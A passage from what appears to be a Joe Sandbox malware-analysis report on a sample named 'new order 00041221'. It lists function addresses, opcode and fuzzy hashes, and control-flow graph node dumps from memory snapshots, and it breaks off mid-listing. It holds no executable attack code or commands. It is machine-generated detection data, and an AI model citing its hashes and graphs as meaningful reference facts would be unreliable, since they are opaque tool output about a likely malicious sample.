                                            • Instruction ID: c29c3c307c69da73ff017a7f695b6394059fa14a8a8835df9c077f89d9aa0517
                                            • Opcode Fuzzy Hash: e834231231176451566fabbacd11e785bc8abfd083aaed7dbb727f10ebea70bb
                                            • Instruction Fuzzy Hash: 1281D574E10219DFEB14DFAAD944A9EBBF2BF88310F14C069E919AB365DB309941CF50
                                            Function 0127EC0A Relevance: .1, Instructions: 149COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8916926dae253b85b7ca185b307348fc9dd5c14501bc126f06957ad7f3c1a629
                                            • Instruction ID: fcbee928d2c914e0177d44e16aa3fcf62a39c0e2c4bb563f4af73702a512e7b9
                                            • Opcode Fuzzy Hash: 8916926dae253b85b7ca185b307348fc9dd5c14501bc126f06957ad7f3c1a629
                                            • Instruction Fuzzy Hash: 3551C874E10208DFDB18DFAAD854A9EBBB2FF89300F24D169E915AB364DB305842CF14
                                            Function 0127EC18 Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 379d66e5582d174ed5e734e090a57ccc828012e8b74905d03b298ab1b0e20fcc
                                            • Instruction ID: 82f8ef9080be793003d24bafd8d196a684d81f6d078b1717bacdcc3c2d9e1ab5
                                            • Opcode Fuzzy Hash: 379d66e5582d174ed5e734e090a57ccc828012e8b74905d03b298ab1b0e20fcc
                                            • Instruction Fuzzy Hash: C751A674E10308DFEB18DFAAD594A9EBBB2FF89300F249169E915AB364DB305841CF54
                                            Function 05A39B94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1049 5a39b94 1050 5a39c53-5a39c64 1049->1050 1051 5a39c66 1050->1051 1052 5a39c6b-5a39c74 1050->1052 1051->1052 1054 5a39a4b-5a39a70 1052->1054 1055 5a39c7a-5a39c8d 1052->1055 1056 5a39a72 1054->1056 1057 5a39a77-5a39aae 1054->1057 1058 5a39c94-5a39caf 1055->1058 1059 5a39c8f 1055->1059 1056->1057 1068 5a39ab0 1057->1068 1069 5a39ab5-5a39ae7 1057->1069 1060 5a39cb1 1058->1060 1061 5a39cb6-5a39cca 1058->1061 1059->1058 1060->1061 1065 5a39cd1-5a39ce7 LdrInitializeThunk 1061->1065 1066 5a39ccc 1061->1066 1067 5a39ce9-5a39de6 1065->1067 1066->1065 1072 5a39de8-5a39ded 1067->1072 1073 5a39dee-5a39df8 1067->1073 1068->1069 1074 5a39b4b-5a39b5e 1069->1074 1075 5a39ae9-5a39b0e 1069->1075 1072->1073 1078 5a39b60 1074->1078 1079 5a39b65-5a39b8a 1074->1079 1076 5a39b10 1075->1076 1077 5a39b15-5a39b43 1075->1077 1076->1077 1077->1074 1078->1079 1083 5a39b99-5a39bd1 1079->1083 1084 5a39b8c-5a39b8d 1079->1084 1085 5a39bd3 1083->1085 1086 5a39bd8-5a39c39 call 5a39590 1083->1086 1084->1055 1085->1086 1092 5a39c40-5a39c52 1086->1092 1093 5a39c3b 1086->1093 1092->1050 1093->1092
                                            APIs
                                            • LdrInitializeThunk.NTDLL(00000000), ref: 05A39CD6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e39888e059605250c94caa20a281583d2001e0d00abd46eed6b4d5334bae92ae
                                            • Instruction ID: 6d0bc07de511e130f30bedd01b4d35befb347cd868d2ef1bd59aff5dbc7b82e8
                                            • Opcode Fuzzy Hash: e39888e059605250c94caa20a281583d2001e0d00abd46eed6b4d5334bae92ae
                                            • Instruction Fuzzy Hash: 17115974E042098FEB04DFA9D485EAEBBF5FF88308F148165E804E7351D6719D41CB60
                                            Function 01278490 Relevance: .7, Instructions: 706COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1885 1278490-127897e 1960 1278984-1278994 1885->1960 1961 1278ed0-1278f05 1885->1961 1960->1961 1962 127899a-12789aa 1960->1962 1966 1278f07-1278f0c 1961->1966 1967 1278f11-1278f2f 1961->1967 1962->1961 1963 12789b0-12789c0 1962->1963 1963->1961 1965 12789c6-12789d6 1963->1965 1965->1961 1968 12789dc-12789ec 1965->1968 1969 1278ff6-1278ffb 1966->1969 1978 1278fa6-1278fb2 1967->1978 1979 1278f31-1278f3b 1967->1979 1968->1961 1971 12789f2-1278a02 1968->1971 1971->1961 1972 1278a08-1278a18 1971->1972 1972->1961 1974 1278a1e-1278a2e 1972->1974 1974->1961 1975 1278a34-1278a44 1974->1975 1975->1961 1977 1278a4a-1278a5a 1975->1977 1977->1961 1980 1278a60-1278ecf 1977->1980 1985 1278fb4-1278fc0 1978->1985 1986 1278fc9-1278fd5 1978->1986 1979->1978 1984 1278f3d-1278f49 1979->1984 1994 1278f6e-1278f71 1984->1994 1995 1278f4b-1278f56 1984->1995 1985->1986 1991 1278fc2-1278fc7 1985->1991 1992 1278fd7-1278fe3 1986->1992 1993 1278fec-1278fee 1986->1993 1991->1969 1992->1993 2005 1278fe5-1278fea 1992->2005 1993->1969 1997 1278f73-1278f7f 1994->1997 1998 1278f88-1278f94 1994->1998 1995->1994 2007 1278f58-1278f62 1995->2007 1997->1998 2009 1278f81-1278f86 1997->2009 2001 1278f96-1278f9d 1998->2001 2002 1278ffc-127901e 1998->2002 2001->2002 2006 1278f9f-1278fa4 2001->2006 2012 1279020 2002->2012 2013 127902e 2002->2013 2005->1969 2006->1969 2007->1994 2014 1278f64-1278f69 2007->2014 2009->1969 2012->2013 2016 1279027-127902c 2012->2016 2017 1279030-1279031 2013->2017 2014->1969 2016->2017
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45745116ac4363bd8559b5dfd03fe45593b266e73a68f4b1f7846e8039833235
                                            • Instruction ID: b1773e871407566e87bdc42a411cb8adcd4dab970ace2d7a9738de4610999b1f
                                            • Opcode Fuzzy Hash: 45745116ac4363bd8559b5dfd03fe45593b266e73a68f4b1f7846e8039833235
                                            • Instruction Fuzzy Hash: FA522030A102198FEB25DBA4C854BAEBB73FF98300F1081A9D10AAB7A5DF355D46DF51
                                            Function 0127E2A8 Relevance: .6, Instructions: 647COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2076 127e2a8-127e2b2 2077 127e2b4 2076->2077 2078 127e2b9-127eb6b call 127eb79 call 127f5af 2076->2078 2077->2078 2397 127eb72-127eb75 2078->2397
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9153ca1859443b9926e4b196d17fa7e4b620957ed7213e32562842d94362d0ee
                                            • Instruction ID: cf9c3b40ef1765d2592803305361ebdd5638ad4409e37f9fb71ee19d4cc1efef
                                            • Opcode Fuzzy Hash: 9153ca1859443b9926e4b196d17fa7e4b620957ed7213e32562842d94362d0ee
                                            • Instruction Fuzzy Hash: 011281350212478FEB646B20F2BC16ABBE5FB5F323706AC44E11F8845CEB7145888F26
                                            Function 01278481 Relevance: .6, Instructions: 571COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2400 1278481-127897e 2475 1278984-1278994 2400->2475 2476 1278ed0-1278f05 2400->2476 2475->2476 2477 127899a-12789aa 2475->2477 2481 1278f07-1278f0c 2476->2481 2482 1278f11-1278f2f 2476->2482 2477->2476 2478 12789b0-12789c0 2477->2478 2478->2476 2480 12789c6-12789d6 2478->2480 2480->2476 2483 12789dc-12789ec 2480->2483 2484 1278ff6-1278ffb 2481->2484 2493 1278fa6-1278fb2 2482->2493 2494 1278f31-1278f3b 2482->2494 2483->2476 2486 12789f2-1278a02 2483->2486 2486->2476 2487 1278a08-1278a18 2486->2487 2487->2476 2489 1278a1e-1278a2e 2487->2489 2489->2476 2490 1278a34-1278a44 2489->2490 2490->2476 2492 1278a4a-1278a5a 2490->2492 2492->2476 2495 1278a60-1278ecf 2492->2495 2500 1278fb4-1278fc0 2493->2500 2501 1278fc9-1278fd5 2493->2501 2494->2493 2499 1278f3d-1278f49 2494->2499 2509 1278f6e-1278f71 2499->2509 2510 1278f4b-1278f56 2499->2510 2500->2501 2506 1278fc2-1278fc7 2500->2506 2507 1278fd7-1278fe3 2501->2507 2508 1278fec-1278fee 2501->2508 2506->2484 2507->2508 2520 1278fe5-1278fea 2507->2520 2508->2484 2512 1278f73-1278f7f 2509->2512 2513 1278f88-1278f94 2509->2513 2510->2509 2522 1278f58-1278f62 2510->2522 2512->2513 2524 1278f81-1278f86 2512->2524 2516 1278f96-1278f9d 2513->2516 2517 1278ffc-127901e 2513->2517 2516->2517 2521 1278f9f-1278fa4 2516->2521 2527 1279020 2517->2527 2528 127902e 2517->2528 2520->2484 2521->2484 2522->2509 2529 1278f64-1278f69 2522->2529 2524->2484 2527->2528 2531 1279027-127902c 2527->2531 2532 1279030-1279031 2528->2532 2529->2484 2531->2532
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71ba43e737d7cecc3cd7cb62946017181f3e66d402d1a822e16f0378b079ab11
                                            • Instruction ID: ed1bd5da1ae961d4b1e8ceb0a3c3cac6bae8a85a729ab8b7d69dcedd41b8a1b1
                                            • Opcode Fuzzy Hash: 71ba43e737d7cecc3cd7cb62946017181f3e66d402d1a822e16f0378b079ab11
                                            • Instruction Fuzzy Hash: F542FD34E1021D8FEB25DBA4C850BAEBA72FF98300F1081A9D10A6B3A5DF355E46DF51
                                            Function 01270C8F Relevance: .5, Instructions: 545COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2591 1270c8f-1270cc0 2593 1270cc7-1270cdd call 1270780 2591->2593 2594 1270cc2 2591->2594 2597 1270ce2 2593->2597 2594->2593 2598 1270cee-127104e call 1270780 * 13 2597->2598 2672 1271056-127107d call 12727f0 2598->2672 2774 1271080 call 12729e0 2672->2774 2775 1271080 call 12729d0 2672->2775 2776 1271080 call 1273c90 2672->2776 2777 1271080 call 1273cc0 2672->2777 2778 1271080 call 1272a69 2672->2778 2675 1271086-1271092 call 12741a0 2676 1271098-12710c2 2675->2676 2679 12710cb-12710ce call 1275362 2676->2679 2680 12710d4-12710fe 2679->2680 2683 1271107-127110a call 127c146 2680->2683 2684 1271110-127113a 2683->2684 2687 1271143-1271146 call 127c468 2684->2687 2688 127114c-1271176 2687->2688 2691 127117f-1271182 call 127c738 2688->2691 2692 1271188-12711b2 2691->2692 2695 12711bb-12711be call 127cd28 2692->2695 2696 12711c4-12711f7 2695->2696 2699 1271203-1271209 call 127cff7 2696->2699 2700 127120f-127124b 2699->2700 2703 1271257-127125d call 127d2ca 2700->2703 2704 1271263-127129f 2703->2704 2707 12712ab-12712b1 call 127d599 2704->2707 2708 12712b7-12713d2 2707->2708 2721 12713de-12713f0 call 1275362 2708->2721 2722 12713f6-127145c 2721->2722 2727 1271467-1271473 call 127d869 2722->2727 2728 1271479-1271485 2727->2728 2729 1271490-127149c call 127d869 2728->2729 2730 12714a2-12714ae 2729->2730 2731 12714b9-12714c5 call 127d869 2730->2731 2732 12714cb-12714d7 2731->2732 2733 12714e2-12714ee call 127d869 2732->2733 2734 12714f4-1271500 2733->2734 2735 127150b-1271517 call 127d869 2734->2735 2736 127151d-1271529 2735->2736 2737 1271534-1271540 call 127d869 2736->2737 2738 1271546-1271552 2737->2738 2739 127155d-1271569 call 127d869 2738->2739 2740 127156f-127158c 2739->2740 2742 1271597-12715a3 call 127d869 2740->2742 2743 12715a9-12715b5 2742->2743 2744 12715c0-12715cc call 127d869 2743->2744 2745 12715d2-12715de 2744->2745 2746 12715e9-12715f5 call 127d869 2745->2746 2747 12715fb-1271607 2746->2747 2748 1271612-127161e call 127d869 2747->2748 2749 1271624-1271630 2748->2749 2750 127163b-1271647 call 127d869 2749->2750 2751 127164d-1271659 2750->2751 2752 1271664-1271670 call 127d869 2751->2752 2753 1271676-1271682 2752->2753 2754 127168d-1271699 call 127d869 2753->2754 2755 127169f-12716ab 2754->2755 2756 12716b6-12716c2 call 127d869 2755->2756 2757 12716c8-12716d4 2756->2757 2758 12716df-12716eb call 127d869 2757->2758 2759 12716f1-12717aa 2758->2759 2774->2675 2775->2675 2776->2675 2777->2675 2778->2675
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae97ed519694aa3676c185f591f00e2063cf0c2d05f418a1b60ebceaa812204e
                                            • Instruction ID: e89102695ee059a934c632d70001e9d67acb0a949c7dc7753f98582c39902046
                                            • Opcode Fuzzy Hash: ae97ed519694aa3676c185f591f00e2063cf0c2d05f418a1b60ebceaa812204e
                                            • Instruction Fuzzy Hash: 8052A074D0022ACFCF64EF65E998A9DBBB2FB49301F104695E509AB358DB306D85CF81
                                            Function 01270CA0 Relevance: .5, Instructions: 539COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa9dda84f9dfee4a68b8b3cdc1123291ad34678167640eb8bd1a01820de0287e
                                            • Instruction ID: 1c47f829d542b483d906d9a741f5bcfd3798847ef35866501b0eca227a02eba8
                                            • Opcode Fuzzy Hash: aa9dda84f9dfee4a68b8b3cdc1123291ad34678167640eb8bd1a01820de0287e
                                            • Instruction Fuzzy Hash: C552A074D0022ACFCF64EF65E998A9DBBB2FB49301F104695E509AB358DB306D85CF81
                                            Function 012776F1 Relevance: .5, Instructions: 476COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3266 12776f1-1277725 3267 1277b54-1277b58 3266->3267 3268 127772b-127774e 3266->3268 3269 1277b71-1277b7f 3267->3269 3270 1277b5a-1277b6e 3267->3270 3277 1277754-1277761 3268->3277 3278 12777fc-1277800 3268->3278 3275 1277b81-1277b96 3269->3275 3276 1277bf0-1277c05 3269->3276 3284 1277b9d-1277baa 3275->3284 3285 1277b98-1277b9b 3275->3285 3286 1277c07-1277c0a 3276->3286 3287 1277c0c-1277c19 3276->3287 3290 1277763-127776e 3277->3290 3291 1277770 3277->3291 3281 1277802-1277810 3278->3281 3282 1277848-1277851 3278->3282 3281->3282 3302 1277812-127782d 3281->3302 3288 1277c67 3282->3288 3289 1277857-1277861 3282->3289 3292 1277bac-1277bed 3284->3292 3285->3292 3293 1277c1b-1277c56 3286->3293 3287->3293 3296 1277c6c-1277c9c 3288->3296 3289->3267 3294 1277867-1277870 3289->3294 3297 1277772-1277774 3290->3297 3291->3297 3341 1277c5d-1277c64 3293->3341 3300 1277872-1277877 3294->3300 3301 127787f-127788b 3294->3301 3325 1277cb5-1277cbc 3296->3325 3326 1277c9e-1277cb4 3296->3326 3297->3278 3305 127777a-12777dc 3297->3305 3300->3301 3301->3296 3303 1277891-1277897 3301->3303 3323 127782f-1277839 3302->3323 3324 127783b 3302->3324 3308 1277b3e-1277b42 3303->3308 3309 127789d-12778ad 3303->3309 3353 12777e2-12777f9 3305->3353 3354 12777de 3305->3354 3308->3288 3312 1277b48-1277b4e 3308->3312 3321 12778c1-12778c3 3309->3321 3322 12778af-12778bf 3309->3322 3312->3267 3312->3294 3328 12778c6-12778cc 3321->3328 3322->3328 3329 127783d-127783f 3323->3329 3324->3329 3328->3308 3335 12778d2-12778e1 3328->3335 3329->3282 3336 1277841 3329->3336 3338 12778e7 3335->3338 3339 127798f-12779ba call 1277538 * 2 3335->3339 3336->3282 3343 12778ea-12778fb 3338->3343 3358 1277aa4-1277abe 3339->3358 3359 12779c0-12779c4 3339->3359 3343->3296 3345 1277901-1277913 3343->3345 3345->3296 3348 1277919-1277931 3345->3348 3410 1277933 call 1278055 3348->3410 3411 1277933 call 1277f35 3348->3411 3412 1277933 call 1277f64 3348->3412 3413 1277933 call 1277fa4 3348->3413 3414 1277933 call 1277fe4 3348->3414 3415 1277933 call 1277f31 3348->3415 3416 1277933 call 1277f3d 3348->3416 3417 1277933 call 1277f39 3348->3417 3418 1277933 call 12780d8 3348->3418 3351 1277939-1277949 3351->3308 3352 127794f-1277952 3351->3352 3356 1277954-127795a 3352->3356 3357 127795c-127795f 3352->3357 3353->3278 3354->3353 3356->3357 3361 1277965-1277968 3356->3361 3357->3288 3357->3361 3358->3267 3377 1277ac4-1277ac8 3358->3377 3359->3308 3360 12779ca-12779ce 3359->3360 3364 12779f6-12779fc 3360->3364 3365 12779d0-12779dd 3360->3365 3366 1277970-1277973 3361->3366 3367 127796a-127796e 3361->3367 3369 1277a37-1277a3d 3364->3369 3370 12779fe-1277a02 3364->3370 3380 12779df-12779ea 3365->3380 3381 12779ec 3365->3381 3366->3288 3368 1277979-127797d 3366->3368 3367->3366 3367->3368 3368->3288 3375 1277983-1277989 3368->3375 3372 1277a3f-1277a43 3369->3372 3373 1277a49-1277a4f 3369->3373 3370->3369 3376 1277a04-1277a0d 3370->3376 3372->3341 3372->3373 3378 1277a51-1277a55 3373->3378 3379 1277a5b-1277a5d 3373->3379 3375->3339 3375->3343 3382 1277a0f-1277a14 3376->3382 3383 1277a1c-1277a32 3376->3383 3384 1277b04-1277b08 3377->3384 3385 1277aca-1277ad4 call 12763e0 3377->3385 3378->3308 3378->3379 3386 1277a92-1277a94 3379->3386 3387 1277a5f-1277a68 3379->3387 3388 12779ee-12779f0 3380->3388 3381->3388 3382->3383 3383->3308 3384->3341 3390 1277b0e-1277b12 3384->3390 3385->3384 3398 1277ad6-1277aeb 3385->3398 3386->3308 3395 1277a9a-1277aa1 3386->3395 3393 1277a77-1277a8d 3387->3393 3394 1277a6a-1277a6f 3387->3394 3388->3308 3388->3364 3390->3341 3396 1277b18-1277b25 3390->3396 3393->3308 3394->3393 3401 1277b27-1277b32 3396->3401 3402 1277b34 3396->3402 3398->3384 3407 1277aed-1277b02 3398->3407 3404 1277b36-1277b38 3401->3404 3402->3404 3404->3308 3404->3341 3407->3267 3407->3384 3410->3351 3411->3351 3412->3351 3413->3351 3414->3351 3415->3351 3416->3351 3417->3351 3418->3351
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f70631cbdf92414199d05c2572f72b63be0a1e76adc17a03b6e8f7595212aaf4
                                            • Instruction ID: 441d33ff9fa684505999d21b7276b7f9a2bd4cffb6de84c0f99020d0d54e3607
                                            • Opcode Fuzzy Hash: f70631cbdf92414199d05c2572f72b63be0a1e76adc17a03b6e8f7595212aaf4
                                            • Instruction Fuzzy Hash: 37124B30A1020ADFDB25CF69D888AAEBBF2FF89314F158599E645DB261D730ED41CB50
                                            Function 01275F38 Relevance: .3, Instructions: 326COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3558 1275f38-1275f5a 3559 1275f70-1275f7b 3558->3559 3560 1275f5c-1275f60 3558->3560 3563 1276023-127604f 3559->3563 3564 1275f81-1275f83 3559->3564 3561 1275f62-1275f6e 3560->3561 3562 1275f88-1275f8f 3560->3562 3561->3559 3561->3562 3565 1275f91-1275f98 3562->3565 3566 1275faf-1275fb8 3562->3566 3570 1276056-12760ae 3563->3570 3567 127601b-1276020 3564->3567 3565->3566 3568 1275f9a-1275fa5 3565->3568 3663 1275fba call 1275f2a 3566->3663 3664 1275fba call 1275f38 3566->3664 3568->3570 3571 1275fab-1275fad 3568->3571 3590 12760b0-12760b6 3570->3590 3591 12760bd-12760cf 3570->3591 3571->3567 3572 1275fc0-1275fc2 3573 1275fc4-1275fc8 3572->3573 3574 1275fca-1275fd2 3572->3574 3573->3574 3577 1275fe5-1276004 call 12769a0 3573->3577 3578 1275fd4-1275fd9 3574->3578 3579 1275fe1-1275fe3 3574->3579 3583 1276006-127600f 3577->3583 3584 1276019 3577->3584 3578->3579 3579->3567 3659 1276011 call 127aef0 3583->3659 3660 1276011 call 127afad 3583->3660 3584->3567 3587 1276017 3587->3567 3590->3591 3593 12760d5-12760d9 3591->3593 3594 1276163-1276165 3591->3594 3595 12760db-12760e7 3593->3595 3596 12760e9-12760f6 3593->3596 3661 1276167 call 1276300 3594->3661 3662 1276167 call 12762f0 3594->3662 3604 12760f8-1276102 3595->3604 3596->3604 3597 127616d-1276173 3600 1276175-127617b 3597->3600 3601 127617f-1276186 3597->3601 3602 12761e1-1276240 3600->3602 3603 127617d 3600->3603 3616 1276247-127626b 3602->3616 3603->3601 3607 1276104-1276113 3604->3607 3608 127612f-1276133 3604->3608 3619 1276115-127611c 3607->3619 3620 1276123-127612d 3607->3620 3609 1276135-127613b 3608->3609 3610 127613f-1276143 3608->3610 3612 127613d 3609->3612 3613 1276189-12761da 3609->3613 3610->3601 3614 1276145-1276149 3610->3614 3612->3601 3613->3602 3614->3616 3617 127614f-1276161 3614->3617 3627 1276271-1276273 3616->3627 3628 127626d-127626f 3616->3628 3617->3601 3619->3620 3620->3608 3629 1276275-1276279 3627->3629 3630 1276284-1276286 3627->3630 3633 12762e9-12762ec 3628->3633 3635 127627f-1276282 3629->3635 3636 127627b-127627d 3629->3636 3637 1276299-127629f 3630->3637 3638 1276288-127628c 3630->3638 3635->3633 3636->3633 3639 12762a1-12762c8 3637->3639 3640 12762ca-12762cc 3637->3640 3641 1276292-1276297 3638->3641 3642 127628e-1276290 3638->3642 3647 12762d3-12762d5 3639->3647 3640->3647 3641->3633 3642->3633 3649 12762d7-12762d9 3647->3649 3650 12762db-12762dd 3647->3650 3649->3633 3653 12762e6 3650->3653 3654 12762df-12762e4 3650->3654 3653->3633 3654->3633 3659->3587 3660->3587 3661->3597 3662->3597 3663->3572 3664->3572
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79333da0f7e1f664c1fba3d78090b5e5ccf2e572b079b29bd3596ee639b835b5
                                            • Instruction ID: 7191a2002b11791a6f0d026ab09a2561519d18bb45eb1f5e56f752095f730945
                                            • Opcode Fuzzy Hash: 79333da0f7e1f664c1fba3d78090b5e5ccf2e572b079b29bd3596ee639b835b5
                                            • Instruction Fuzzy Hash: 52B1C0307246128FEB269F29D858B7F7BE2BF89200F148569E506CB395DB74CC42C791
                                            Function 01276498 Relevance: .2, Instructions: 231COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3666 1276498-12764a5 3667 12764a7-12764ab 3666->3667 3668 12764ad-12764af 3666->3668 3667->3668 3670 12764b4-12764bf 3667->3670 3669 12766c0-12766c7 3668->3669 3671 12764c5-12764cc 3670->3671 3672 12766c8 3670->3672 3673 12764d2-12764e1 3671->3673 3674 1276661-1276667 3671->3674 3676 12766cd-1276705 3672->3676 3675 12764e7-12764f6 3673->3675 3673->3676 3677 127666d-1276671 3674->3677 3678 1276669-127666b 3674->3678 3684 127650b-127650e 3675->3684 3685 12764f8-12764fb 3675->3685 3691 1276707-127670c 3676->3691 3692 127670e-1276712 3676->3692 3679 1276673-1276679 3677->3679 3680 12766be 3677->3680 3678->3669 3679->3672 3682 127667b-127667e 3679->3682 3680->3669 3682->3672 3686 1276680-1276695 3682->3686 3688 127651a-1276520 3684->3688 3689 1276510-1276513 3684->3689 3687 12764fd-1276500 3685->3687 3685->3688 3701 1276697-127669d 3686->3701 3702 12766b9-12766bc 3686->3702 3695 1276506 3687->3695 3696 1276601-1276607 3687->3696 3693 1276522-1276528 3688->3693 3694 1276538-1276555 3688->3694 3697 1276566-127656c 3689->3697 3698 1276515 3689->3698 3703 1276718-127671a 3691->3703 3692->3703 3704 127652c-1276536 3693->3704 3705 127652a 3693->3705 3739 127655e-1276561 3694->3739 3700 127662c-1276639 3695->3700 3706 127661f-1276629 3696->3706 3707 1276609-127660f 3696->3707 3708 1276584-1276596 3697->3708 3709 127656e-1276574 3697->3709 3698->3700 3724 127664d-127664f 3700->3724 3725 127663b-127663f 3700->3725 3710 12766af-12766b2 3701->3710 3711 127669f-12766ad 3701->3711 3702->3669 3712 127672f-1276736 3703->3712 3713 127671c-127672e 3703->3713 3704->3694 3705->3694 3706->3700 3715 1276613-127661d 3707->3715 3716 1276611 3707->3716 3729 12765a6-12765c9 3708->3729 3730 1276598-12765a4 3708->3730 3717 1276576 3709->3717 3718 1276578-1276582 3709->3718 3710->3672 3719 12766b4-12766b7 3710->3719 3711->3672 3711->3710 3715->3706 3716->3706 3717->3708 3718->3708 3719->3701 3719->3702 3734 1276653-1276656 3724->3734 3725->3724 3733 1276641-1276645 3725->3733 3729->3672 3743 12765cf-12765d2 3729->3743 3740 12765f1-12765ff 3730->3740 3733->3672 3735 127664b 3733->3735 3734->3672 3736 1276658-127665b 3734->3736 3735->3734 3736->3673 3736->3674 3739->3700 3740->3700 3743->3672 3744 12765d8-12765ea 3743->3744 3744->3740
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0257c3422b105a7a827ba02a3056469fbc3f126cc3e8501b5be9bd56ed2c5626
                                            • Instruction ID: ad89ad5161c43bcffc216958c8bf114d7ea5c2cc0e0de0b1deecad0e72c53452
                                            • Opcode Fuzzy Hash: 0257c3422b105a7a827ba02a3056469fbc3f126cc3e8501b5be9bd56ed2c5626
                                            • Instruction Fuzzy Hash: A981AF30A20906CFEB18CF6DD484AABBBF2FF89210B548169D605EB365DB35EC41CB50
                                            Function 0127AEF0 Relevance: .2, Instructions: 207COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3806 127aef0-127aef1 3807 127af53 3806->3807 3808 127aef3-127aef5 3806->3808 3809 127af57-127af5e 3807->3809 3808->3809 3810 127aef7-127af40 3808->3810 3811 127af64-127afc1 3809->3811 3812 127b02f-127b051 3809->3812 3810->3807 3818 127af42-127af4d 3810->3818 3820 127afca-127afd3 3811->3820 3824 127b0b3-127b0ba 3812->3824 3825 127b053-127b059 3812->3825 3818->3807 3823 127afd6-127b028 3818->3823 3823->3812 3826 127b0bb-127b0e2 call 127b060 3824->3826 3825->3826 3827 127b05b-127b06b 3825->3827 3843 127b1ab 3826->3843 3844 127b0e8-127b0ed 3826->3844 3830 127b072-127b074 3827->3830 3831 127b06d call 1277c88 3827->3831 3833 127b076-127b083 3830->3833 3834 127b085-127b093 3830->3834 3831->3830 3839 127b0a3-127b0a6 3833->3839 3840 127b095-127b09f 3834->3840 3841 127b0a1 3834->3841 3840->3839 3841->3839 3847 127b1b0-127b1c1 3843->3847 3844->3843 3845 127b0f3-127b112 3844->3845 3852 127b113-127b11c 3845->3852 3853 127b15b-127b16f 3845->3853 3854 127b223-127b250 3847->3854 3855 127b1c3-127b1ef 3847->3855 3852->3843 3856 